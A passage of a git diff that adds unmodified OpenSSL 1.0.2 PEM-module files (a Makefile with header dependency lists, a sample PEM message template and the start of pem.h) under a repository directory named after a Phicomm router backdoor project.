+pem_pk8.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_pk8.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_pk8.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_pk8.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+pem_pk8.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+pem_pk8.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_pk8.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_pk8.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pem_pk8.c
+pem_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_pkey.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_pkey.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+pem_pkey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pem_pkey.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pem_pkey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pem_pkey.o: ../../include/openssl/opensslconf.h
+pem_pkey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_pkey.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_pkey.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+pem_pkey.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+pem_pkey.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_pkey.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_pkey.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+pem_pkey.o: pem_pkey.c
+pem_seal.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_seal.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_seal.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_seal.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_seal.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_seal.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_seal.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_seal.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_seal.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pem_seal.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+pem_seal.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_seal.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_seal.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pem_seal.c
+pem_sign.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_sign.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_sign.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_sign.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_sign.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_sign.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_sign.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_sign.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pem_sign.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_sign.o: ../cryptlib.h pem_sign.c
+pem_x509.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_x509.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_x509.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_x509.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_x509.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_x509.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_x509.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_x509.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_x509.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pem_x509.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_x509.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_x509.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pem_x509.c
+pem_xaux.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_xaux.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_xaux.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_xaux.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_xaux.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_xaux.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_xaux.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_xaux.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_xaux.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pem_xaux.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_xaux.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_xaux.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pem_xaux.c
+pvkfmt.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pvkfmt.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+pvkfmt.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+pvkfmt.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pvkfmt.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pvkfmt.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pvkfmt.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pvkfmt.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+pvkfmt.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+pvkfmt.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+pvkfmt.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pvkfmt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pvkfmt.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pvkfmt.o: ../cryptlib.h pvkfmt.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/Makefile.save
new file mode 100644
index 0000000..8f118d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/Makefile.save
@@ -0,0 +1,240 @@
+#
+# OpenSSL/crypto/pem/Makefile
+#
+
+DIR=	pem
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC= pem_sign.c pem_seal.c pem_info.c pem_lib.c pem_all.c pem_err.c \
+	pem_x509.c pem_xaux.c pem_oth.c pem_pk8.c pem_pkey.c pvkfmt.c
+
+LIBOBJ=	pem_sign.o pem_seal.o pem_info.o pem_lib.o pem_all.o pem_err.o \
+	pem_x509.o pem_xaux.o pem_oth.o pem_pk8.o pem_pkey.o pvkfmt.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= pem.h pem2.h
+HEADER=	$(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links: $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+pem_all.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_all.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_all.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+pem_all.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+pem_all.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_all.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_all.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_all.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_all.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_all.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+pem_all.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_all.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_all.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_all.o: ../cryptlib.h pem_all.c
+pem_err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pem_err.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+pem_err.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pem_err.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pem_err.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pem_err.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pem_err.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+pem_err.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+pem_err.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_err.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_err.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_err.o: pem_err.c
+pem_info.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_info.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_info.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+pem_info.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pem_info.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pem_info.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pem_info.o: ../../include/openssl/opensslconf.h
+pem_info.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_info.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_info.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+pem_info.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_info.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_info.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_info.o: ../cryptlib.h pem_info.c
+pem_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_lib.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_lib.o: ../../include/openssl/crypto.h ../../include/openssl/des.h
+pem_lib.o: ../../include/openssl/des_old.h ../../include/openssl/e_os2.h
+pem_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_lib.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_lib.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+pem_lib.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+pem_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/ui.h
+pem_lib.o: ../../include/openssl/ui_compat.h ../../include/openssl/x509.h
+pem_lib.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+pem_lib.o: pem_lib.c
+pem_oth.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_oth.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_oth.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_oth.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_oth.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_oth.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_oth.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_oth.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_oth.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pem_oth.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_oth.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_oth.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_oth.o: ../cryptlib.h pem_oth.c
+pem_pk8.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_pk8.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_pk8.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_pk8.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_pk8.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_pk8.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_pk8.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_pk8.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_pk8.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+pem_pk8.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+pem_pk8.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_pk8.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_pk8.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pem_pk8.c
+pem_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_pkey.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_pkey.o: ../../include/openssl/crypto.h ../../include/openssl/dh.h
+pem_pkey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pem_pkey.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pem_pkey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pem_pkey.o: ../../include/openssl/opensslconf.h
+pem_pkey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_pkey.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_pkey.o: ../../include/openssl/pkcs12.h ../../include/openssl/pkcs7.h
+pem_pkey.o: ../../include/openssl/rand.h ../../include/openssl/safestack.h
+pem_pkey.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_pkey.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_pkey.o: ../../include/openssl/x509_vfy.h ../asn1/asn1_locl.h ../cryptlib.h
+pem_pkey.o: pem_pkey.c
+pem_seal.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_seal.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_seal.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_seal.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_seal.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_seal.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_seal.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_seal.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_seal.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pem_seal.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+pem_seal.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_seal.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_seal.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pem_seal.c
+pem_sign.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_sign.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_sign.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_sign.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_sign.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_sign.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_sign.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_sign.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_sign.o: ../../include/openssl/pkcs7.h ../../include/openssl/rand.h
+pem_sign.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pem_sign.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pem_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pem_sign.o: ../cryptlib.h pem_sign.c
+pem_x509.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_x509.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_x509.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_x509.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_x509.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_x509.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_x509.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_x509.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_x509.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pem_x509.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_x509.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_x509.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pem_x509.c
+pem_xaux.o: ../../e_os.h ../../include/openssl/asn1.h
+pem_xaux.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+pem_xaux.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+pem_xaux.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+pem_xaux.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+pem_xaux.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+pem_xaux.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+pem_xaux.o: ../../include/openssl/pem.h ../../include/openssl/pem2.h
+pem_xaux.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+pem_xaux.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+pem_xaux.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+pem_xaux.o: ../../include/openssl/x509_vfy.h ../cryptlib.h pem_xaux.c
+pvkfmt.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+pvkfmt.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+pvkfmt.o: ../../include/openssl/crypto.h ../../include/openssl/dsa.h
+pvkfmt.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+pvkfmt.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+pvkfmt.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+pvkfmt.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+pvkfmt.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+pvkfmt.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+pvkfmt.o: ../../include/openssl/rand.h ../../include/openssl/rsa.h
+pvkfmt.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+pvkfmt.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+pvkfmt.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+pvkfmt.o: ../cryptlib.h pvkfmt.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/message b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/message
new file mode 100644
index 0000000..e8bf9d7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/message
@@ -0,0 +1,16 @@
+-----BEGIN PRIVACY-ENHANCED MESSAGE-----
+Proc-Type: 4,ENCRYPTED
+Proc-Type: 4,MIC-ONLY
+Proc-Type: 4,MIC-CLEAR
+Content-Domain: RFC822
+DEK-Info: DES-CBC,0123456789abcdef
+Originator-Certificate
+ xxxx
+Issuer-Certificate
+ xxxx
+MIC-Info: RSA-MD5,RSA,
+ xxxx
+
+
+-----END PRIVACY-ENHANCED MESSAGE-----
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem.h
new file mode 100644
index 0000000..d3b23fc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem.h
@@ -0,0 +1,615 @@
+/* crypto/pem/pem.h */
+/* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_PEM_H
+# define HEADER_PEM_H
+
+# include <openssl/e_os2.h>
+# ifndef OPENSSL_NO_BIO
+#  include <openssl/bio.h>
+# endif
+# ifndef OPENSSL_NO_STACK
+#  include <openssl/stack.h>
+# endif
+# include <openssl/evp.h>
+# include <openssl/x509.h>
+# include <openssl/pem2.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# define PEM_BUFSIZE             1024
+
+# define PEM_OBJ_UNDEF           0
+# define PEM_OBJ_X509            1
+# define PEM_OBJ_X509_REQ        2
+# define PEM_OBJ_CRL             3
+# define PEM_OBJ_SSL_SESSION     4
+# define PEM_OBJ_PRIV_KEY        10
+# define PEM_OBJ_PRIV_RSA        11
+# define PEM_OBJ_PRIV_DSA        12
+# define PEM_OBJ_PRIV_DH         13
+# define PEM_OBJ_PUB_RSA         14
+# define PEM_OBJ_PUB_DSA         15
+# define PEM_OBJ_PUB_DH          16
+# define PEM_OBJ_DHPARAMS        17
+# define PEM_OBJ_DSAPARAMS       18
+# define PEM_OBJ_PRIV_RSA_PUBLIC 19
+# define PEM_OBJ_PRIV_ECDSA      20
+# define PEM_OBJ_PUB_ECDSA       21
+# define PEM_OBJ_ECPARAMETERS    22
+
+# define PEM_ERROR               30
+# define PEM_DEK_DES_CBC         40
+# define PEM_DEK_IDEA_CBC        45
+# define PEM_DEK_DES_EDE         50
+# define PEM_DEK_DES_ECB         60
+# define PEM_DEK_RSA             70
+# define PEM_DEK_RSA_MD2         80
+# define PEM_DEK_RSA_MD5         90
+
+# define PEM_MD_MD2              NID_md2
+# define PEM_MD_MD5              NID_md5
+# define PEM_MD_SHA              NID_sha
+# define PEM_MD_MD2_RSA          NID_md2WithRSAEncryption
+# define PEM_MD_MD5_RSA          NID_md5WithRSAEncryption
+# define PEM_MD_SHA_RSA          NID_sha1WithRSAEncryption
+
+# define PEM_STRING_X509_OLD     "X509 CERTIFICATE"
+# define PEM_STRING_X509         "CERTIFICATE"
+# define PEM_STRING_X509_PAIR    "CERTIFICATE PAIR"
+# define PEM_STRING_X509_TRUSTED "TRUSTED CERTIFICATE"
+# define PEM_STRING_X509_REQ_OLD "NEW CERTIFICATE REQUEST"
+# define PEM_STRING_X509_REQ     "CERTIFICATE REQUEST"
+# define PEM_STRING_X509_CRL     "X509 CRL"
+# define PEM_STRING_EVP_PKEY     "ANY PRIVATE KEY"
+# define PEM_STRING_PUBLIC       "PUBLIC KEY"
+# define PEM_STRING_RSA          "RSA PRIVATE KEY"
+# define PEM_STRING_RSA_PUBLIC   "RSA PUBLIC KEY"
+# define PEM_STRING_DSA          "DSA PRIVATE KEY"
+# define PEM_STRING_DSA_PUBLIC   "DSA PUBLIC KEY"
+# define PEM_STRING_PKCS7        "PKCS7"
+# define PEM_STRING_PKCS7_SIGNED "PKCS #7 SIGNED DATA"
+# define PEM_STRING_PKCS8        "ENCRYPTED PRIVATE KEY"
+# define PEM_STRING_PKCS8INF     "PRIVATE KEY"
+# define PEM_STRING_DHPARAMS     "DH PARAMETERS"
+# define PEM_STRING_DHXPARAMS    "X9.42 DH PARAMETERS"
+# define PEM_STRING_SSL_SESSION  "SSL SESSION PARAMETERS"
+# define PEM_STRING_DSAPARAMS    "DSA PARAMETERS"
+# define PEM_STRING_ECDSA_PUBLIC "ECDSA PUBLIC KEY"
+# define PEM_STRING_ECPARAMETERS "EC PARAMETERS"
+# define PEM_STRING_ECPRIVATEKEY "EC PRIVATE KEY"
+# define PEM_STRING_PARAMETERS   "PARAMETERS"
+# define PEM_STRING_CMS          "CMS"
+
+  /*
+   * Note that this structure is initialised by PEM_SealInit and cleaned up
+   * by PEM_SealFinal (at least for now)
+   */
+typedef struct PEM_Encode_Seal_st {
+    EVP_ENCODE_CTX encode;
+    EVP_MD_CTX md;
+    EVP_CIPHER_CTX cipher;
+} PEM_ENCODE_SEAL_CTX;
+
+/* enc_type is one off */
+# define PEM_TYPE_ENCRYPTED      10
